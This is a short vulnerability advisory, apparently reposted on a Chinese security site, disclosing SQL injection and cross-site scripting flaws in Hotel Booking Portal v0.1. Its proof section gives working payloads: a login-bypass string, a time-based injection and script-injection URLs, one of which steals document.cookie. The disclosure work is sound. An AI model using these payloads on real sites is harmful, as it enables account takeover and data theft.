Hotel Booking Portal v0.1 Multiple Vulnerabilities 作者 Yakir Wizman, <yakir.wizman@gmail.com> 下载 地址 http://sourceforge.net/projects/hbportal/ I. 描述 # ----------------------------------------------------------- # 1). A vulnerability exists in 'login.php' - Allows for 'SQL injection' of the 'email' and 'password' POST parameters. # 2). A vulnerability exists in 'searchresults.php' - Allows for 'SQL injection' of the 'country' POST parameter. # 3). A vulnerability exists in 'includes/languagebar.php' - Allows for 'Cross site scripting' of the 'window.location' js # 4). A vulnerability exists in 'administrator/login.php' - Allows for 'Cross site scripting' of the 'window.location' js # 5). A vulnerability exists in 'index.php' - Allows for 'Cross site scripting' of the 'lang' GET parameter. # # ----------------------------------------------------------- # II. 测试证明 # ----------------------------------------------------------- # 1). POST a form to login.php with the value of: # email set to : ' or '1'='1 # password set to : ' or '1'='1 # 2). POST to searchresults.php with the value of 'country' set to Armenia' and sleep(1)=' # 3). http://www.2cto.com /hbportal/includes/languagebar.php?xss=";</script><script>alert(1);</script><script> # 4). http://127.0.0.1/hbportal/administrator/login.php?xss=";</script><script>alert(1);</script><script> # 5). http://127.0.0.1/hbportal/index.php?lang=";</script><script>alert(document.cookie);</script><script> # -----------------------------------------------------------
查看更多关于Hotel Booking Portal v0.1多重缺陷及修复 - 网站安全的详细内容...